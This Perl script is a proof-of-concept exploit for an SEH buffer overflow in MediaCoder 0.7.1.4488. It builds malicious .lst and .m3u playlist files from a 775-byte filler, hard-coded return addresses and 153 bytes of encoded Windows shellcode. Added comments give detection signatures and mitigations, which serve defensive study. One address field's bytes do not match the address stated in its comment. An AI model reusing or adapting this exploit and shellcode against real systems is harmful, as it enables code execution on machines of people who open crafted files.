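#!/usr/bin/perl
#[+] software : MediaCoder 0.7.1.4488 (.lst & .m3u) Universal Buffer overflow (SEH)
#[+] Author : opt!x hacker
#[+] greetz to germaya_x because he finds an exploit in MediaCoder 0.7.1.4486
#[+] download :http://www.mediacoderhq.com/dlfull.htm
#[+] tested under: SP2 (FR)
##########################################################
#
# Purpose: proof-of-concept generator. It writes the same crafted byte string
# to two playlist files (mediacoder.lst and mediacoder.m3u) in the current
# directory. Per the header, an over-long playlist entry overruns a stack
# buffer in MediaCoder 0.7.1.4488 and overwrites an SEH record.
#
# Layout of each file, as built below:
#   775 bytes of 0x41 | 4 bytes | 4 bytes | 153-byte payload
# The two 4-byte fields are hard-coded values that the author's comments
# attribute to specific modules; they are reproduced here unchanged.
#
# Reviewer notes (defensive):
#   * Detection: each generated file is one line with no newline. It starts
#     with 775 'A' (0x41) bytes and continues with non-printable bytes. A
#     playlist entry of that length containing binary data is anomalous and
#     is a workable content signature for .lst/.m3u scanning.
#   * Payload: per the author's annotation it is a windows/exec stub running
#     notepad.exe; a process spawned by the media application while it opens
#     a playlist is the behavioural indicator.
#   * Mitigation for this bug class: bounds-check playlist lines in the
#     parser, and build every loaded module with SafeSEH/ASLR/DEP. The page
#     does not name a fixed version.

use strict;
use warnings;

# windows/exec - 153 bytes
# Encoder: x86/jmp_call_additive
# EXITFUNC=seh, CMD=notepad.exe
my $shellcode =
    "\xfc\xeb\x11\x5e\xbf\x5c\xae\xcd\xea\x56\x31\x3e\xad\x01" .
    "\xc7\x85\xc0\x75\xf7\xc3\xe8\xea\xff\xff\xff\xa0\x46\x89" .
    "\xea\x58\x97\x99\xae\x64\x1c\xe1\x35\xec\x23\xf5\xbd\x43" .
    "\x3c\x82\x9d\x7b\x3d\x7f\x68\xf0\x09\xf4\x6a\xe8\x43\xca" .
    "\xf4\x58\x27\x0a\x72\xa7\xe9\x41\x76\xa6\x2b\xbe\x7d\x93" .
    "\xff\x65\x7a\x96\x1a\xee\xdd\x7c\xe4\x1a\x87\xf7\xea\x97" .
    "\xc3\x58\xef\x26\x3f\xed\x13\xa2\xbe\x1a\xa2\xe8\xe4\xd8" .
    "\x76\x4f\xd4\x16\x18\x26\x72\x5d\x9f\xf6\xf1\x21\x2c\x7c" .
    "\x75\xbd\x81\x09\x1e\xb5\x50\xf5\x5c\x05\x08\x56\x0b\x75" .
    "\x47\x52\x94\x1d\xc0\xa5\xa0\xd3\xa7\xa6\x52\x85\x28\x2d" .
    "\xf8\x29\xd6\xa9\x2c\xac\x60\x57\x31\x2e\x91\x97\x31";

# Filler that precedes the two 4-byte fields.
my $junk = "\x41" x 775;

my $next_seh1 = "\x10\x00\xF3\xA2";    # call esp in mcres.dll = 0x1000F3A2
my $seh       = "\x31\x66\x66\x31";    # pop pop ret->mediacoder.exe
my $next_seh2 = "\x87\x51\x37\x00";    # jmp esp in sdl.dll

# Append $bytes to $path and fail loudly on any I/O error.
# The original used an unchecked two-argument open on a bareword handle that
# was re-opened without being closed, so open and write failures went
# unnoticed. Append mode ('>>') is kept from the original.
sub _append_bytes {
    my ($path, $bytes) = @_;

    open my $fh, '>>', $path or die "open $path: $!";
    print {$fh} $bytes or die "write $path: $!";
    # Buffered write errors only surface at close, so check it too.
    close $fh or die "close $path: $!";
    return;
}

_append_bytes('mediacoder.lst', $junk . $next_seh1 . $seh . $shellcode);
_append_bytes('mediacoder.m3u', $junk . $next_seh2 . $seh . $shellcode);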